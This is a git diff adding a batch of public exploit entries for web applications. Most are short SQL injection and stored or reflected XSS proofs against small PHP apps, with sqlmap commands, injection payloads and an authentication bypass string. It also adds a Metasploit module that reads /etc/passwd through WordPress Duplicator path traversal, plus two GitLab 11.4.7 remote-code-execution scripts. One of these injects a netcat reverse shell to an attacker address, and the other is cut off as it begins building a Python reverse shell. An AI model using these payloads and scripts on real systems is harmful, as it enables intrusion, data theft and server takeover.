+    Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE
+(SELECT 4035 UNION SELECT 6415) END))
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT
+COUNT(*),CONCAT(0x716b6a7871,(SELECT
+(ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: action=edit & id=22 AND (SELECT 4861 FROM
+(SELECT(SLEEP(5)))xiXm)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 9 columns
+    Payload: action=edit & id=22 UNION ALL SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL--
+-
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49275.txt b/exploits/php/webapps/49275.txt
new file mode 100644
index 000000000..c8740df9a
--- /dev/null
+++ b/exploits/php/webapps/49275.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any valid credentials
+
+Step 2. Click on the username in header and select "Manage Account".
+
+Step 3. On "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields.
+
+Step 4. Complete the other required details and click on save to update user information.
+
+Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/49276.txt b/exploits/php/webapps/49276.txt
new file mode 100644
index 000000000..e1a407869
--- /dev/null
+++ b/exploits/php/webapps/49276.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on Customer and select list.
+
+Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: page=edit_staff&id=1 AND 4164=4164
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 10 columns
+    Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49277.txt b/exploits/php/webapps/49277.txt
new file mode 100644
index 000000000..eeb81aa67
--- /dev/null
+++ b/exploits/php/webapps/49277.txt
@@ -0,0 +1,74 @@
+# Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "Bookings" in header and select "Add Bookings".
+
+Step 3. Complete the required details and click on "Save" to save the new Bookings.
+
+Step 4. On the "Bookings" page, find your new booking/existing booking and click on the edit icon.
+
+Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite.
+
+Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
+
+Step 7. This will inject successfully and you will have an information disclosure of all databases contents.
+
+---
+
+Parameter: id (GET)
+
+    Type: boolean-based blind
+
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+
+    Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg
+
+
+
+    Type: error-based
+
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+   
+ Payload: id=2' AND (SELECT 7113 FROM(SELECT 
+COUNT(*),CONCAT(0x716a626a71,(SELECT 
+(ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM 
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP
+
+
+
+    Type: stacked queries
+
+    Title: MySQL >= 5.0.12 stacked queries (comment)
+
+    Payload: id=2';SELECT SLEEP(5)#
+
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+    Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq
+
+
+
+    Type: UNION query
+
+    Title: MySQL UNION query (NULL) - 4 columns
+
+   
+ Payload: id=-1072' UNION ALL SELECT 
+NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL#
+
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49278.txt b/exploits/php/webapps/49278.txt
new file mode 100644
index 000000000..d997212aa
--- /dev/null
+++ b/exploits/php/webapps/49278.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-09
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the application with any valid user credentials.
+
+Step 2: Click on Add New Question Page.
+
+Step 3: input "<script>alert(document.cookie)</script>" in the new question
+field and select add new question.
+
+Step 4: Once you have an XSS payload as a question in add new question
+page, click on View Questions Page.
+
+Step 5: This will trigger the XSS payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/49279.txt b/exploits/php/webapps/49279.txt
new file mode 100644
index 000000000..f720ae655
--- /dev/null
+++ b/exploits/php/webapps/49279.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-10
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Click on View Candidates page and select take exam. If there is no
+candidate, click on "Add New Candidate" page, fill details and add new
+candidate.
+
+Step 3. Click on "Take Exam" and capture the request in burpsuite.
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap
+-r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980
+UNION SELECT 3372) END))
+
+    Type: stacked queries
+    Title: MySQL >= 5.0.12 stacked queries (comment)
+    Payload: id=1;SELECT SLEEP(5)#
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49280.txt b/exploits/php/webapps/49280.txt
new file mode 100644
index 000000000..ba550882e
--- /dev/null
+++ b/exploits/php/webapps/49280.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Employee Record System 1.0 - Multiple Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-09
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the application with any valid user credentials.
+
+Step 2: Click on Add Employee.
+
+Step 3: input "<script>alert(1)</script>" in all fields except phone number
+fields. Note: increase the values of "1" in "alert(1)" to determine which
+field is vulnerable. Eg <script>alert(2)</script>,
+<script>alert(3)</script> ....etc.
+
+Step 4: Once all fields are completed, Click on ADD RECORD to save the
+record.
+
+Step 5: Click on All Employees page and this will trigger the Stored XSS.
+
+Step 6: To view all Stored XSS, after clicking on All Employees page, click
+on the View Employee Icon. This will tigger all Stored XSS payloads.
\ No newline at end of file
diff --git a/exploits/php/webapps/49281.txt b/exploits/php/webapps/49281.txt
new file mode 100644
index 000000000..17b345c98
--- /dev/null
+++ b/exploits/php/webapps/49281.txt
@@ -0,0 +1,52 @@
+# Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)
+# Date: 2020-12-14
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.phpjabbers.com
+# Software Link: https://www.phpjabbers.com/appointment-scheduler
+# Version: 2.3
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)
+# CVE: CVE-2020-35416
+
+Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.
+
+Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.
+
+PoC Request:
+GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1
+Host: [removed]
+Connection: close
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://[removed]
+Accept-Encoding: gzip, deflate
+Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422
+
+PoC Response:
+HTTP/1.1 200 OK
+Server: nginx
+Date: Thu, 14 Dec 2020 10:48:41 GMT
+Content-Type: text/html; charset=utf-8
+Connection: close
+Vary: Accept-Encoding
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+Access-Control-Allow-Methods: POST, GET, OPTIONS
+Access-Control-Allow-Headers: Origin, X-Requested-With
+Content-Length: 13988
+
+<div class="container-fluid">
+   <div class="row">
+       <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">
+           <div class="panel panel-default pjAsContainer pjAsAside">
+               <div class="panel-heading p
+...[SNIP]...
+<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>
+...[SNIP]...
\ No newline at end of file
diff --git a/exploits/php/webapps/49282.txt b/exploits/php/webapps/49282.txt
new file mode 100644
index 000000000..608340a2c
--- /dev/null
+++ b/exploits/php/webapps/49282.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Victor CMS 1.0 - Multiple SQL Injection (Authenticated)
+# Date: 17.12.2020
+# Exploit Author: Furkan Göksel
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+# Description: The Victor CMS v1.0 application is vulnerable to SQL
+# injection in c_id parameter of admin_edit_comment.php, p_id parameter
+# of admin_edit_post.php, u_id parameter of admin_edit_user.php, edit
+# parameter of admin_update_categories.php.
+
+# Tested on: Apache2/Linux
+
+Step 1: Register the system through main page and login your account
+
+Step 2: After successful login, select one of the specified tabs
+(post, categories, comments, users)
+
+Step 3: When you click edit button of these records, an HTTP request
+is sent to server to get details of this record with corresponding
+parameters (eg. for edit comment it is c_id parameter)
+
+Step 4: Inject your SQL payload to these ids or use sqlmap to dump
+
+Example PoC request is as follows:
+
+GET /cve/admin/comment.php?source=edit_comment&c_id=2%20AND%20SLEEP(10) HTTP/1.1
+
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=st8hhobgplut500p3lpug8qa66
+Upgrade-Insecure-Requests: 1
+
+Same PoC payload is valid for all edit features of specified tabs.
\ No newline at end of file
diff --git a/exploits/php/webapps/49284.txt b/exploits/php/webapps/49284.txt
new file mode 100644
index 000000000..2ffa9620d
--- /dev/null
+++ b/exploits/php/webapps/49284.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Point of Sale System 1.0 - Authentication Bypass
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-17
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as Administrator.
+
+Step 1: On the login page, simply use { ' or 0=0 # } as username
+
+Step 2: On the login page, use same query{ ' or 0=0 # } as password
+
+All set you should be logged in as Administrator.
\ No newline at end of file
diff --git a/exploits/php/webapps/49285.txt b/exploits/php/webapps/49285.txt
new file mode 100644
index 000000000..584be69f9
--- /dev/null
+++ b/exploits/php/webapps/49285.txt
@@ -0,0 +1,19 @@
+# Exploit Title:  Alumni Management System 1.0 - Unrestricted File Upload To RCE
+# Exploit Author: Aakash Madaan
+# Date: 2020-12-17
+# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "System Settings" page.
+
+Step 3. At the image upload field, browse and select any php webshell.
+Click on upload to upload the php webshell.
+
+Step 4. Visit "http://localhost/admin/assets/uploads/" and select your
+upload phpwebshell.
+
+Step 5. You should have a remote code execution.
\ No newline at end of file
diff --git a/exploits/php/webapps/49286.txt b/exploits/php/webapps/49286.txt
new file mode 100644
index 000000000..e7b97becb
--- /dev/null
+++ b/exploits/php/webapps/49286.txt
@@ -0,0 +1,19 @@
+# Exploit Title:  Alumni Management System 1.0 - "Course Form" Stored XSS
+# Exploit Author: Aakash Madaan
+# Date: 2020-12-10
+# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on the "Course List" page.
+
+Step 3. In the "Course Form" field, use XSS payload
+"<script>alert("course")</script>" as the name of new course and click on
+save.
+
+Step 4. This should trigger the XSS payload and anytime you click on the
+"Course List" page, your stored XSS payload will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49287.txt b/exploits/php/webapps/49287.txt
new file mode 100644
index 000000000..7670d6c7c
--- /dev/null
+++ b/exploits/php/webapps/49287.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Alumni Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Aakash Madaan
+# Date: 2020-12-17
+# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "Events" page.
+
+Step 3. Choose any event and select "view" or "edit". The url should be "
+http://localhost/index.php?page=view_event&id=2" or "
+http://localhost/admin/index.php?page=manage_event&id=1"
+
+Step 4. Capture the request to the "view" or "edit" event page in burpsuite.
+
+Step 5. Save the captured request and run sqlmap on it using "sqlmap -r
+request --time-sec=5 --dbs
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: page=edit_student&id=(SELECT (CASE WHEN (6191=6191) THEN 3
+ELSE (SELECT 5620 UNION SELECT 3605) END))
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=edit_student&id=3 AND (SELECT 7847 FROM
+(SELECT(SLEEP(5)))LQiE)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 9 columns
+    Payload: page=edit_student&id=-4840 UNION ALL SELECT
+NULL,CONCAT(0x717a7a7171,0x7152494c444964626e63466c66734573495771697a566862414e6c6f786e6d54566c6549484f6967,0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+-
+---
+
+Step 6. Sqlmap should inject the web-app successfully which leads to
+information disclosure
\ No newline at end of file
diff --git a/exploits/php/webapps/49288.rb b/exploits/php/webapps/49288.rb
new file mode 100755
index 000000000..4e0b49df5
--- /dev/null
+++ b/exploits/php/webapps/49288.rb
@@ -0,0 +1,64 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+    include Msf::Auxiliary::Report
+    include Msf::Exploit::Remote::HTTP::Wordpress
+    include Msf::Auxiliary::Scanner
+      def initialize(info = {})
+      super(update_info(info,
+                        'Name' => 'WordPress Duplicator File Read Vulnerability',
+                        'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.},
+                        'References' =>
+                          [
+                            ['CVE', '2020-11738'],
+                            ['WPVDB', '10078'],
+                            ['URL', 'https://snapcreek.com/duplicator/docs/changelog']
+                          ],
+                        'Author' =>
+                          [
+                            'Ramuel Gall', # Vulnerability discovery
+                            'Hoa Nguyen - SunCSR Team' # Metasploit module
+                          ],
+                        'DisclosureDate' => 'Feb 19 2020',
+                        'License' => MSF_LICENSE
+              ))
+        register_options(
+        [
+          OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+          OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
+        ])
+    end
+      def check
+      check_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24')
+    end
+      def run_host(ip)
+      traversal = '../' * datastore['DEPTH']
+      filename = datastore['FILEPATH']
+      filename = filename[1, filename.length] if filename =~ /^\//
+        res = send_request_cgi({
+                               'method' => 'GET',
+                               'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'),
+                               'vars_get' =>
+                                 {
+                                   'action' => 'duplicator_download',
+                                   'file' => "#{traversal}#{filename}"
+                                 }
+                             })
+        fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
+      fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+        print_status('Downloading file...')
+      print_line("\n#{res.body}\n")
+        fname = datastore['FILEPATH']
+        path = store_loot(
+        'duplicator.traversal',
+        'text/plain',
+        ip,
+        res.body,
+        fname
+      )
+      print_good("File saved in: #{path}")
+    end
+  end
\ No newline at end of file
diff --git a/exploits/php/webapps/49290.txt b/exploits/php/webapps/49290.txt
new file mode 100644
index 000000000..ac103321f
--- /dev/null
+++ b/exploits/php/webapps/49290.txt
@@ -0,0 +1,18 @@
+# Exploit Title:  Smart Hospital 3.1 - "Add Patient" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-18
+# Vendor Homepage: https://smart-hospital.in/index.html
+# Software Link: https://codecanyon.net/item/smart-hospital-hospital-management-system/23205038
+# Affected Version: Version 3.1
+# Tested on: Kali Linux
+
+Step 1. Login to the application with Super Admin credentials
+
+Step 2. Click on "OPD-Out Patient" and then click on "Add Patient" then
+select "Add Patient" Again.
+
+Step 3. Insert payload - "><svg/onmouseover=alert(1)> ,  in Name , Guardian
+Name  , Email , Address , Remarks and Any Known Allergies and Save it.
+
+Step 4. Now the patient profile will open , when your course will move
+around profile details they will show an alert box.
\ No newline at end of file
diff --git a/exploits/php/webapps/49292.txt b/exploits/php/webapps/49292.txt
new file mode 100644
index 000000000..fbc5b2538
--- /dev/null
+++ b/exploits/php/webapps/49292.txt
@@ -0,0 +1,17 @@
+# Exploit Title:  Xeroneit Library Management System 3.1 - "Add Book Category " Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-18
+# Vendor Homepage: https://xeroneit.net/
+# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
+# Affected Version: Version 3.1
+# Tested on: Kali Linux
+
+Step 1. Login to the application as Admin.
+
+Step 2. Select "Book" from menu and click on "Book Category" . Now , click
+on "Add" Button.
+
+Step 3. Insert payload - "><img src onerror=alert(1)> ,  in "Category Name"
+and Save it.
+
+Step 4. Now you will see an alert box .
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49257.py b/exploits/ruby/webapps/49257.py
new file mode 100755
index 000000000..e44dae0c7
--- /dev/null
+++ b/exploits/ruby/webapps/49257.py
@@ -0,0 +1,64 @@
+# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
+# Date: 14-12-2020
+# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
+# Vendor Homepage: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested On: Debian 10 + Apache/2.4.46 (Debian)
+# Version: 11.4.7 community
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+
+# Sign in GitLab 11.4.7  portal and get (using Burp or something other):
+# authenticity_token
+# authenticated cookies
+# username
+# specify localport and localip for reverse shell
+
+username='aaaaaaaaaaaa'
+authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
+cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
+localport='1234'
+localip='192.168.0.114'
+
+
+url = "http://192.168.0.130:5080"
+proxies = { "http": "http://localhost:8080" }
+
+
+def deb(str):
+    print("Debug => "+str)
+
+def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
+    return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
+
+import string
+def random_string(length):
+    return ''.join(random.choice(string.ascii_letters) for m in range(length))
+
+def init(username,cookie,authenticity_token,localport,localip):
+    from bs4 import BeautifulSoup
+    import re
+    import urllib.parse
+    deb("Token: "+authenticity_token)
+    deb("Cookie: "+cookie)
+    session=requests.Session()
+    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
+    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
+    soup = BeautifulSoup(r.content,"lxml")
+    nsid = soup.findAll('input', {"id": "project_namespace_id"})
+    namespace_id=nsid[0]['value'];
+    deb("Namespace ID: "+namespace_id)
+    prgname=random_string(8)
+    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
+    newpayload=urllib.parse.urlencode(newpayload)
+    deb("Payload encoded: "+newpayload)
+    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
+    os.system("nc -nvlp "+localport)
+
+init(username,cookie,authenticity_token,localport,localip)
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49263.py b/exploits/ruby/webapps/49263.py
new file mode 100755
index 000000000..792c682a8
--- /dev/null
+++ b/exploits/ruby/webapps/49263.py
@@ -0,0 +1,262 @@
+# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
+# Date: 15th December 2020
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
+# Software Link: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested on: GitLab 11.4.7 CE
+# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
+
+import requests
+import re
+import warnings
+from bs4 import BeautifulSoup
+import sys
+import base64
+import urllib
+from random_words import RandomWords
+import argparse
+import os
+import time
+
+
+
+
+parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
+parser.add_argument('-U',help='GitLab Username')
+parser.add_argument('-P',help='Gitlab Password')
+parser.add_argument('-l',help='rev shell lhost')
+parser.add_argument('-p',help='rev shell lport ',type=int)
+args = parser.parse_args()
+
+
+username = args.U
+password = args.P
+lhost = args.l
+lport = args.p
+
+
+#Retrieve CSRF Token
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+gitlab_url = "http://10.129.49.62:5080"
+request = requests.Session()
+print("[+] Retrieving CSRF token to submit the login form")
+time.sleep(1)
+page = request.get(gitlab_url+"/users/sign_in")
+html_content = page.text
+soup = BeautifulSoup(html_content,features="lxml")
+token = soup.findAll('meta')[16].get("content")
+
+
+print("[+] CSRF Token : "+token)
+time.sleep(1)
+
+
+#Login
+
+login_info ={
+            "authenticity_token": token,
+            "user[login]": username,
+            "user[password]": password,
+            "user[remember_me]": "0"
+}
+
+
+login_request = request.post(gitlab_url+"/users/sign_in",login_info)
+
+
+if login_request.status_code==200:
+	print("[+] Login Successful")
+	time.sleep(1)
+
+else:
+
+	print("Login Failed")
+	print(" ")
+	sys.exit()
+
+
+
+
+#Exploitation
+
+print("[+] Running Exploit")
+time.sleep(1)
+print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
+time.sleep(1)
+
+ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
+
+
+r = RandomWords()
+project_name = r.random_word()
+project_url = '%s/%s/'%(gitlab_url,username)
+
+print("[+] Creating Project")
+time.sleep(1)
+print("[+] Project Name : "+project_name)
+time.sleep(1)
+
+print("[+] Creating Python Reverse Shell")
+time.sleep(1)
+
+
